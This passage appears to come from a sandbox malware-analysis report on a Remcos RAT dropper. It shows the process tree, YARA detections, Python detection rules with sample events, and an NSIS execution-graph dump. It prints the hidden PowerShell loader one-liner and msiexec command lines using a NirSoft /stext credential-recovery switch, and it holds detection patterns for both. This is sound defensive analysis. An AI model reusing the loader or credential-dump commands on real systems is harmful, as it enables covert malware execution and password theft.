                                                            Start date:18/12/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                            Imagebase:0x7ff7403e0000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:14
                                                            Start time:05:05:03
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                            Imagebase:0x40000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000003.2928845396.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000003.2898152047.0000000005709000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000003.2928001965.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000003.2899931678.0000000005709000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.3391979783.000000000287F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000003.3221293540.0000000005709000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.3394879441.00000000056B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000003.2896409361.0000000005709000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.3395028821.0000000005709000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:16
                                                            Start time:05:05:19
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"
                                                            Imagebase:0x40000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:17
                                                            Start time:05:05:19
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"
                                                            Imagebase:0x40000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:05:05:19
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa"
                                                            Imagebase:0x40000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:05:05:19
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa"
                                                            Imagebase:0x40000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:05:05:19
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\irnfnubnwufuubhrkbjztnmhqi"
                                                            Imagebase:0x40000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true
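The process list above is the loader chain in order: the PowerShell one-liner reads Rygklapperne.Tis225 raw, carves a three-character substring out of it and dot-invokes that substring on the whole file body (the three characters are not shown on this page; treating them as a cmdlet name such as iex is an assumption), msiexec.exe is then started with no arguments at all, and later copies of msiexec.exe run with the NirSoft /stext switch, which Windows Installer does not have. The Python rules below are an added example, not Joe Sandbox code. They assume Sysmon/EDR-style process-creation events with image path and command line (parent links are not used because the report lists the processes flat), and the sample events are constructed from the command lines listed above plus one constructed benign msiexec /i install as a control.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int       # constructed; only used as the key in scan() output
    image: str     # image path of the new process
    cmdline: str   # full command line as logged


# R1: PowerShell reads a dropped file as one string (gc -raw), carves a 1-4
# character token out of it with SubString(offset, len) and dot-invokes that
# token on the file body.  The token is not on the page; "iex" below is an
# assumption used only in the constructed stand-in file.
PS_LOADER = re.compile(
    r"(?:gc|cat|type|Get-Content)\s+-raw\b"      # whole file into one string
    r".*?\.SubString\(\s*\d+\s*,\s*[1-4]\s*\)"    # carve a tiny token from it
    r".*?\.\s*\$\w+\s*\(",                        # .$token(...) = invoke it
    re.I | re.S,
)
SUBSTRING = re.compile(r"\.SubString\(\s*(\d+)\s*,\s*(\d+)\s*\)", re.I)

# R2: /stext is the NirSoft "save report as text" switch; msiexec.exe has no
# such switch, so msiexec.exe + /stext is the injected password-recovery tool.
STEXT = re.compile(r"(?:^|\s)/stext\b", re.I)


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def args_after_image(cmdline: str) -> str:
    """Command line with the leading (possibly quoted) image path removed."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].strip() if end != -1 else ""
    parts = s.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def evaluate(ev: ProcEvent) -> list[str]:
    """Names of the rules the event matches, in fixed order R1, R2, R3."""
    hits = []
    name = image_name(ev.image)
    if name == "powershell.exe" and PS_LOADER.search(ev.cmdline):
        hits.append("ps_substring_invoke_loader")
    if name == "msiexec.exe":
        args = args_after_image(ev.cmdline)
        if STEXT.search(args):
            hits.append("msiexec_nirsoft_stext")
        elif args == "":
            # R3: the Windows Installer service runs as "msiexec.exe /V" and
            # interactive use always carries switches; an argument-less
            # msiexec.exe is a typical hollowing/injection host.  Weak alone.
            hits.append("msiexec_no_args_host")
    return hits


def carve_invoked_token(cmdline: str, file_text: str) -> str:
    """What PowerShell would dot-invoke: SubString(offset, len) of the file text.
    Run it against the real dropped file from the host; here a constructed
    stand-in is used because the page does not show the file."""
    m = SUBSTRING.search(cmdline)
    if not m:
        return ""
    off, ln = int(m.group(1)), int(m.group(2))
    return file_text[off:off + ln]


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    report = {}
    for ev in events:
        hits = evaluate(ev)
        if hits:
            report[ev.pid] = hits
    return report


# Constructed events built from the command lines in the process list above,
# plus a constructed benign "msiexec /i" install as a control.
SAMPLE = [
    ProcEvent(0, r"C:\Users\user\Desktop\RFQ NO 65-58003.exe",
              r'"C:\Users\user\Desktop\RFQ NO 65-58003.exe"'),
    ProcEvent(2, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish)'''),
    ProcEvent(3, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(14, r"C:\Windows\SysWOW64\msiexec.exe", r'"C:\Windows\SysWOW64\msiexec.exe"'),
    ProcEvent(16, r"C:\Windows\SysWOW64\msiexec.exe",
              r'C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"'),
    ProcEvent(99, r"C:\Windows\System32\msiexec.exe",
              r'C:\Windows\System32\msiexec.exe /i "C:\Users\user\Downloads\setup.msi" /qn'),
]
# Constructed stand-in for Rygklapperne.Tis225: filler up to offset 65822, then the token.
STANDIN_FILE = "#" * 65822 + "iex" + "\n# rest of the script body (constructed)"

if __name__ == "__main__":
    print(scan(SAMPLE))
    print("invoked token:", carve_invoked_token(SAMPLE[1].cmdline, STANDIN_FILE))
```

R1 keys on the shape of the loader rather than on the variable names, which are randomised per build; R2 is the high-confidence signal because there is no legitimate reason for msiexec.exe to carry a NirSoft switch; R3 alone is only a hint and is meant to be correlated with R1 or R2 on the same host.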


                                                              Execution Graph

                                                              Execution Coverage:21.7%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:20.3%
                                                              Total number of Nodes:1344
                                                              Total number of Limit Nodes:29
execution_graph: interactive node graph rendered by the report viewer; the raw node list is not reproduced. The listed portion starts at node 0x4015c1, and the nodes it contains call the following Windows APIs: GetFileAttributesW, SetCurrentDirectoryW, CreateDirectoryW, SetFileSecurityW, GetLastError, CharNextW, CharPrevW, lstrlenW, lstrcatW, lstrcpyW, lstrcpynW, wsprintfA, wsprintfW, GetVersion, GetSystemDirectoryW, GetWindowsDirectoryW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, CoTaskMemFree, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetModuleHandleA, GetProcAddress, LoadLibraryExW, SetWindowTextW, SendMessageW, DeleteFileW, RemoveDirectoryW, SetFileAttributesW, FindFirstFileW, FindNextFileW, FindClose, MoveFileExW, GetShortPathNameW, CreateFileW, GetFileSize, GlobalAlloc, CloseHandle.
405e6a ReadFile 3307->3322 3308->3298 3313 406031 lstrcpyA 3318 406053 3313->3318 3314 406045 3315 405d4c 4 API calls 3314->3315 3315->3318 3316 40608a SetFilePointer 3329 405e99 WriteFile 3316->3329 3318->3316 3320->3299 3321->3305 3323 405e88 3322->3323 3323->3308 3324 405d4c lstrlenA 3323->3324 3325 405d8d lstrlenA 3324->3325 3326 405d66 lstrcmpiA 3325->3326 3328 405d95 3325->3328 3327 405d84 CharNextA 3326->3327 3326->3328 3327->3325 3328->3313 3328->3314 3330 405eb7 GlobalFree 3329->3330 3330->3308 3927 401e43 3928 402c31 18 API calls 3927->3928 3929 401e49 3928->3929 3930 402c31 18 API calls 3929->3930 3931 401e55 3930->3931 3932 401e61 ShowWindow 3931->3932 3933 401e6c EnableWindow 3931->3933 3934 402adb 3932->3934 3933->3934 3935 4028c3 3936 402c53 18 API calls 3935->3936 3937 4028d1 3936->3937 3938 4028e7 3937->3938 3939 402c53 18 API calls 3937->3939 3940 405dc2 2 API calls 3938->3940 3939->3938 3941 4028ed 3940->3941 3963 405de7 GetFileAttributesW CreateFileW 3941->3963 3943 4028fa 3944 402906 GlobalAlloc 3943->3944 3945 40299d 3943->3945 3946 402994 CloseHandle 3944->3946 3947 40291f 3944->3947 3948 4029a5 DeleteFileW 3945->3948 3949 4029b8 3945->3949 3946->3945 3964 403402 SetFilePointer 3947->3964 3948->3949 3951 402925 3952 4033ec ReadFile 3951->3952 3953 40292e GlobalAlloc 3952->3953 3954 402972 3953->3954 3955 40293e 3953->3955 3956 405e99 WriteFile 3954->3956 3957 40317b 45 API calls 3955->3957 3958 40297e GlobalFree 3956->3958 3962 40294b 3957->3962 3959 40317b 45 API calls 3958->3959 3960 402991 3959->3960 3960->3946 3961 402969 GlobalFree 3961->3954 3962->3961 3963->3943 3964->3951 3965 404ac7 3966 404af3 3965->3966 3967 404ad7 3965->3967 3969 404b26 3966->3969 3970 404af9 SHGetPathFromIDListW 3966->3970 3976 40593b GetDlgItemTextW 3967->3976 3972 404b10 SendMessageW 3970->3972 3973 404b09 3970->3973 3971 404ae4 SendMessageW 3971->3966 3972->3969 3974 40140b 2 API calls 3973->3974 3974->3972 3976->3971 3344 40344a SetErrorMode GetVersion 3345 
403485 3344->3345 3346 40347f 3344->3346 3348 40657c 3 API calls 3345->3348 3347 4065ec 5 API calls 3346->3347 3347->3345 3349 40349b lstrlenA 3348->3349 3349->3345 3350 4034ab 3349->3350 3351 4065ec 5 API calls 3350->3351 3352 4034b3 3351->3352 3353 4065ec 5 API calls 3352->3353 3354 4034ba #17 OleInitialize SHGetFileInfoW 3353->3354 3432 406212 lstrcpynW 3354->3432 3356 4034f7 GetCommandLineW 3433 406212 lstrcpynW 3356->3433 3358 403509 GetModuleHandleW 3359 403521 3358->3359 3360 405bf3 CharNextW 3359->3360 3361 403530 CharNextW 3360->3361 3362 40365a GetTempPathW 3361->3362 3370 403549 3361->3370 3434 403419 3362->3434 3364 403672 3365 403676 GetWindowsDirectoryW lstrcatW 3364->3365 3366 4036cc DeleteFileW 3364->3366 3367 403419 12 API calls 3365->3367 3444 402ed5 GetTickCount GetModuleFileNameW 3366->3444 3371 403692 3367->3371 3368 405bf3 CharNextW 3368->3370 3370->3368 3376 403645 3370->3376 3377 403643 3370->3377 3371->3366 3372 403696 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3371->3372 3375 403419 12 API calls 3372->3375 3373 403797 ExitProcess CoUninitialize 3379 4038cd 3373->3379 3380 4037ad 3373->3380 3374 4036e0 3374->3373 3378 403783 3374->3378 3386 405bf3 CharNextW 3374->3386 3384 4036c4 3375->3384 3530 406212 lstrcpynW 3376->3530 3377->3362 3474 403a5b 3378->3474 3382 403951 ExitProcess 3379->3382 3383 4038d5 GetCurrentProcess OpenProcessToken 3379->3383 3533 405957 3380->3533 3390 403921 3383->3390 3391 4038ed LookupPrivilegeValueW AdjustTokenPrivileges 3383->3391 3384->3366 3384->3373 3400 4036ff 3386->3400 3393 4065ec 5 API calls 3390->3393 3391->3390 3392 403793 3392->3373 3396 403928 3393->3396 3394 4037c3 3397 4058da 5 API calls 3394->3397 3395 40375d 3398 405cce 18 API calls 3395->3398 3399 40393d ExitWindowsEx 3396->3399 3403 40394a 3396->3403 3401 4037c8 lstrcatW 3397->3401 3402 403769 3398->3402 3399->3382 3399->3403 3400->3394 3400->3395 3404 4037e4 lstrcatW lstrcmpiW 3401->3404 3405 4037d9 lstrcatW 3401->3405 
3402->3373 3531 406212 lstrcpynW 3402->3531 3542 40140b 3403->3542 3404->3373 3407 403800 3404->3407 3405->3404 3409 403805 3407->3409 3410 40380c 3407->3410 3412 405840 4 API calls 3409->3412 3414 4058bd 2 API calls 3410->3414 3411 403778 3532 406212 lstrcpynW 3411->3532 3415 40380a 3412->3415 3416 403811 SetCurrentDirectoryW 3414->3416 3415->3416 3417 403821 3416->3417 3418 40382c 3416->3418 3537 406212 lstrcpynW 3417->3537 3538 406212 lstrcpynW 3418->3538 3421 406234 18 API calls 3422 40386b DeleteFileW 3421->3422 3423 403878 CopyFileW 3422->3423 3429 40383a 3422->3429 3423->3429 3424 4038c1 3425 4060b3 38 API calls 3424->3425 3427 4038c8 3425->3427 3426 4060b3 38 API calls 3426->3429 3427->3373 3428 406234 18 API calls 3428->3429 3429->3421 3429->3424 3429->3426 3429->3428 3431 4038ac CloseHandle 3429->3431 3539 4058f2 CreateProcessW 3429->3539 3431->3429 3432->3356 3433->3358 3435 4064a6 5 API calls 3434->3435 3436 403425 3435->3436 3437 40342f 3436->3437 3438 405bc6 3 API calls 3436->3438 3437->3364 3439 403437 3438->3439 3440 4058bd 2 API calls 3439->3440 3441 40343d 3440->3441 3545 405e16 3441->3545 3549 405de7 GetFileAttributesW CreateFileW 3444->3549 3446 402f18 3473 402f25 3446->3473 3550 406212 lstrcpynW 3446->3550 3448 402f3b 3449 405c12 2 API calls 3448->3449 3450 402f41 3449->3450 3551 406212 lstrcpynW 3450->3551 3452 402f4c GetFileSize 3453 40304d 3452->3453 3471 402f63 3452->3471 3552 402e33 3453->3552 3457 403090 GlobalAlloc 3461 4030a7 3457->3461 3458 4030e8 3459 402e33 33 API calls 3458->3459 3459->3473 3465 405e16 2 API calls 3461->3465 3462 403071 3463 4033ec ReadFile 3462->3463 3466 40307c 3463->3466 3464 402e33 33 API calls 3464->3471 3467 4030b8 CreateFileW 3465->3467 3466->3457 3466->3473 3468 4030f2 3467->3468 3467->3473 3567 403402 SetFilePointer 3468->3567 3470 403100 3568 40317b 3470->3568 3471->3453 3471->3458 3471->3464 3471->3473 3583 4033ec 3471->3583 3473->3374 3475 4065ec 5 API calls 3474->3475 3476 403a6f 3475->3476 3477 403a75 
3476->3477 3478 403a87 3476->3478 3631 406159 wsprintfW 3477->3631 3479 4060df 3 API calls 3478->3479 3480 403ab7 3479->3480 3481 403ad6 lstrcatW 3480->3481 3484 4060df 3 API calls 3480->3484 3483 403a85 3481->3483 3615 403d31 3483->3615 3484->3481 3487 405cce 18 API calls 3488 403b08 3487->3488 3489 403b9c 3488->3489 3492 4060df 3 API calls 3488->3492 3490 405cce 18 API calls 3489->3490 3491 403ba2 3490->3491 3493 403bb2 LoadImageW 3491->3493 3495 406234 18 API calls 3491->3495 3494 403b3a 3492->3494 3496 403c58 3493->3496 3497 403bd9 RegisterClassW 3493->3497 3494->3489 3498 403b5b lstrlenW 3494->3498 3502 405bf3 CharNextW 3494->3502 3495->3493 3501 40140b 2 API calls 3496->3501 3499 403c62 3497->3499 3500 403c0f SystemParametersInfoW CreateWindowExW 3497->3500 3503 403b69 lstrcmpiW 3498->3503 3504 403b8f 3498->3504 3499->3392 3500->3496 3505 403c5e 3501->3505 3506 403b58 3502->3506 3503->3504 3507 403b79 GetFileAttributesW 3503->3507 3508 405bc6 3 API calls 3504->3508 3505->3499 3510 403d31 19 API calls 3505->3510 3506->3498 3509 403b85 3507->3509 3511 403b95 3508->3511 3509->3504 3512 405c12 2 API calls 3509->3512 3513 403c6f 3510->3513 3632 406212 lstrcpynW 3511->3632 3512->3504 3515 403c7b ShowWindow 3513->3515 3516 403cfe 3513->3516 3518 40657c 3 API calls 3515->3518 3624 405444 OleInitialize 3516->3624 3520 403c93 3518->3520 3519 403d04 3522 403d20 3519->3522 3523 403d08 3519->3523 3521 403ca1 GetClassInfoW 3520->3521 3524 40657c 3 API calls 3520->3524 3526 403cb5 GetClassInfoW RegisterClassW 3521->3526 3527 403ccb DialogBoxParamW 3521->3527 3525 40140b 2 API calls 3522->3525 3523->3499 3529 40140b 2 API calls 3523->3529 3524->3521 3525->3499 3526->3527 3528 40140b 2 API calls 3527->3528 3528->3499 3529->3499 3530->3377 3531->3411 3532->3378 3534 40596c 3533->3534 3535 4037bb ExitProcess 3534->3535 3536 405980 MessageBoxIndirectW 3534->3536 3536->3535 3537->3418 3538->3429 3540 405931 3539->3540 3541 405925 CloseHandle 3539->3541 3540->3429 3541->3540 3543 
401389 2 API calls 3542->3543 3544 401420 3543->3544 3544->3382 3546 405e23 GetTickCount GetTempFileNameW 3545->3546 3547 403448 3546->3547 3548 405e59 3546->3548 3547->3364 3548->3546 3548->3547 3549->3446 3550->3448 3551->3452 3553 402e44 3552->3553 3554 402e5c 3552->3554 3555 402e54 3553->3555 3556 402e4d DestroyWindow 3553->3556 3557 402e64 3554->3557 3558 402e6c GetTickCount 3554->3558 3555->3457 3555->3473 3586 403402 SetFilePointer 3555->3586 3556->3555 3587 406628 3557->3587 3558->3555 3560 402e7a 3558->3560 3561 402e82 3560->3561 3562 402eaf CreateDialogParamW ShowWindow 3560->3562 3561->3555 3591 402e17 3561->3591 3562->3555 3564 402e90 wsprintfW 3565 405371 25 API calls 3564->3565 3566 402ead 3565->3566 3566->3555 3567->3470 3569 4031a6 3568->3569 3570 40318a SetFilePointer 3568->3570 3594 403283 GetTickCount 3569->3594 3570->3569 3573 403243 3573->3473 3574 405e6a ReadFile 3575 4031c6 3574->3575 3575->3573 3576 403283 43 API calls 3575->3576 3577 4031dd 3576->3577 3577->3573 3578 403249 ReadFile 3577->3578 3580 4031ec 3577->3580 3578->3573 3580->3573 3581 405e6a ReadFile 3580->3581 3582 405e99 WriteFile 3580->3582 3581->3580 3582->3580 3584 405e6a ReadFile 3583->3584 3585 4033ff 3584->3585 3585->3471 3586->3462 3588 406645 PeekMessageW 3587->3588 3589 406655 3588->3589 3590 40663b DispatchMessageW 3588->3590 3589->3555 3590->3588 3592 402e26 3591->3592 3593 402e28 MulDiv 3591->3593 3592->3593 3593->3564 3595 4032b1 3594->3595 3596 4033db 3594->3596 3607 403402 SetFilePointer 3595->3607 3597 402e33 33 API calls 3596->3597 3604 4031ad 3597->3604 3599 4032bc SetFilePointer 3603 4032e1 3599->3603 3600 4033ec ReadFile 3600->3603 3602 402e33 33 API calls 3602->3603 3603->3600 3603->3602 3603->3604 3605 405e99 WriteFile 3603->3605 3606 4033bc SetFilePointer 3603->3606 3608 40672b 3603->3608 3604->3573 3604->3574 3605->3603 3606->3596 3607->3599 3609 406750 3608->3609 3610 406758 3608->3610 3609->3603 3610->3609 3611 4067e8 GlobalAlloc 3610->3611 3612 4067df 
GlobalFree 3610->3612 3613 406856 GlobalFree 3610->3613 3614 40685f GlobalAlloc 3610->3614 3611->3609 3611->3610 3612->3611 3613->3614 3614->3609 3614->3610 3616 403d45 3615->3616 3633 406159 wsprintfW 3616->3633 3618 403db6 3619 406234 18 API calls 3618->3619 3620 403dc2 SetWindowTextW 3619->3620 3621 403ae6 3620->3621 3622 403dde 3620->3622 3621->3487 3622->3621 3623 406234 18 API calls 3622->3623 3623->3622 3634 404322 3624->3634 3626 40548e 3627 404322 SendMessageW 3626->3627 3629 4054a0 CoUninitialize 3627->3629 3628 405467 3628->3626 3637 401389 3628->3637 3629->3519 3631->3483 3632->3489 3633->3618 3635 40433a 3634->3635 3636 40432b SendMessageW 3634->3636 3635->3628 3636->3635 3639 401390 3637->3639 3638 4013fe 3638->3628 3639->3638 3640 4013cb MulDiv SendMessageW 3639->3640 3640->3639 3977 402a4b 3978 402c31 18 API calls 3977->3978 3979 402a51 3978->3979 3980 402a88 3979->3980 3982 4028a1 3979->3982 3983 402a63 3979->3983 3981 406234 18 API calls 3980->3981 3980->3982 3981->3982 3983->3982 3985 406159 wsprintfW 3983->3985 3985->3982 3989 4016cc 3990 402c53 18 API calls 3989->3990 3991 4016d2 GetFullPathNameW 3990->3991 3992 4016ec 3991->3992 3993 40170e 3991->3993 3992->3993 3996 406555 2 API calls 3992->3996 3994 401723 GetShortPathNameW 3993->3994 3995 402adb 3993->3995 3994->3995 3997 4016fe 3996->3997 3997->3993 3999 406212 lstrcpynW 3997->3999 3999->3993 4000 401b4d 4001 402c53 18 API calls 4000->4001 4002 401b54 4001->4002 4003 402c31 18 API calls 4002->4003 4004 401b5d wsprintfW 4003->4004 4005 402adb 4004->4005 4013 40234e 4014 402c53 18 API calls 4013->4014 4015 40235d 4014->4015 4016 402c53 18 API calls 4015->4016 4017 402366 4016->4017 4018 402c53 18 API calls 4017->4018 4019 402370 GetPrivateProfileStringW 4018->4019 4020 402851 4021 402859 4020->4021 4022 40285d FindNextFileW 4021->4022 4024 40286f 4021->4024 4023 4028b6 4022->4023 4022->4024 4026 406212 lstrcpynW 4023->4026 4026->4024 3819 401ed5 3820 402c53 18 API calls 3819->3820 3821 
401edb 3820->3821 3822 405371 25 API calls 3821->3822 3823 401ee5 3822->3823 3824 4058f2 2 API calls 3823->3824 3825 401eeb 3824->3825 3826 4028a1 3825->3826 3827 401f4a CloseHandle 3825->3827 3828 401efb WaitForSingleObject 3825->3828 3827->3826 3829 401f0d 3828->3829 3830 401f1f GetExitCodeProcess 3829->3830 3833 406628 2 API calls 3829->3833 3831 401f31 3830->3831 3832 401f3e 3830->3832 3837 406159 wsprintfW 3831->3837 3832->3827 3835 401f3c 3832->3835 3836 401f14 WaitForSingleObject 3833->3836 3835->3827 3836->3829 3837->3835 4027 401956 4028 402c53 18 API calls 4027->4028 4029 40195d lstrlenW 4028->4029 4030 4025a8 4029->4030 4031 4014d7 4032 402c31 18 API calls 4031->4032 4033 4014dd Sleep 4032->4033 4035 402adb 4033->4035 4036 401f58 4037 402c53 18 API calls 4036->4037 4038 401f5f 4037->4038 4039 406555 2 API calls 4038->4039 4040 401f65 4039->4040 4042 401f76 4040->4042 4043 406159 wsprintfW 4040->4043 4043->4042 4044 402259 4045 402c53 18 API calls 4044->4045 4046 40225f 4045->4046 4047 402c53 18 API calls 4046->4047 4048 402268 4047->4048 4049 402c53 18 API calls 4048->4049 4050 402271 4049->4050 4051 406555 2 API calls 4050->4051 4052 40227a 4051->4052 4053 40228b lstrlenW lstrlenW 4052->4053 4057 40227e 4052->4057 4055 405371 25 API calls 4053->4055 4054 405371 25 API calls 4058 402286 4054->4058 4056 4022c9 SHFileOperationW 4055->4056 4056->4057 4056->4058 4057->4054 4057->4058 4059 4068da 4063 40675e 4059->4063 4060 4070c9 4061 4067e8 GlobalAlloc 4061->4060 4061->4063 4062 4067df GlobalFree 4062->4061 4063->4060 4063->4061 4063->4062 4064 406856 GlobalFree 4063->4064 4065 40685f GlobalAlloc 4063->4065 4064->4065 4065->4060 4065->4063 3838 40175c 3839 402c53 18 API calls 3838->3839 3840 401763 3839->3840 3841 405e16 2 API calls 3840->3841 3842 40176a 3841->3842 3843 405e16 2 API calls 3842->3843 3843->3842 4066 4022dd 4067 4022e4 4066->4067 4070 4022f7 4066->4070 4068 406234 18 API calls 4067->4068 4069 4022f1 4068->4069 4071 405957 MessageBoxIndirectW 
4069->4071 4071->4070 4072 402660 4073 402c31 18 API calls 4072->4073 4074 40266f 4073->4074 4075 4026b9 ReadFile 4074->4075 4076 405e6a ReadFile 4074->4076 4077 4026f9 MultiByteToWideChar 4074->4077 4078 4027ae 4074->4078 4081 40271f SetFilePointer MultiByteToWideChar 4074->4081 4082 4027bf 4074->4082 4084 4027ac 4074->4084 4085 405ec8 SetFilePointer 4074->4085 4075->4074 4075->4084 4076->4074 4077->4074 4094 406159 wsprintfW 4078->4094 4081->4074 4083 4027e0 SetFilePointer 4082->4083 4082->4084 4083->4084 4086 405ee4 4085->4086 4091 405f00 4085->4091 4087 405e6a ReadFile 4086->4087 4088 405ef0 4087->4088 4089 405f31 SetFilePointer 4088->4089 4090 405f09 SetFilePointer 4088->4090 4088->4091 4089->4091 4090->4089 4092 405f14 4090->4092 4091->4074 4093 405e99 WriteFile 4092->4093 4093->4091 4094->4084 4095 401563 4096 402a81 4095->4096 4099 406159 wsprintfW 4096->4099 4098 402a86 4099->4098 4107 4052e5 4108 4052f5 4107->4108 4109 405309 4107->4109 4110 4052fb 4108->4110 4119 405352 4108->4119 4111 405311 IsWindowVisible 4109->4111 4114 405328 4109->4114 4112 404322 SendMessageW 4110->4112 4113 40531e 4111->4113 4111->4119 4116 405305 4112->4116 4120 404c3b SendMessageW 4113->4120 4115 405357 CallWindowProcW 4114->4115 4125 404cbb 4114->4125 4115->4116 4119->4115 4121 404c9a SendMessageW 4120->4121 4122 404c5e GetMessagePos ScreenToClient SendMessageW 4120->4122 4124 404c92 4121->4124 4123 404c97 4122->4123 4122->4124 4123->4121 4124->4114 4134 406212 lstrcpynW 4125->4134 4127 404cce 4135 406159 wsprintfW 4127->4135 4129 404cd8 4130 40140b 2 API calls 4129->4130 4131 404ce1 4130->4131 4136 406212 lstrcpynW 4131->4136 4133 404ce8 4133->4119 4134->4127 4135->4129 4136->4133 4137 401968 4138 402c31 18 API calls 4137->4138 4139 40196f 4138->4139 4140 402c31 18 API calls 4139->4140 4141 40197c 4140->4141 4142 402c53 18 API calls 4141->4142 4143 401993 lstrlenW 4142->4143 4144 4019a4 4143->4144 4145 4019e5 4144->4145 4149 406212 lstrcpynW 4144->4149 4147 4019d5 4147->4145 
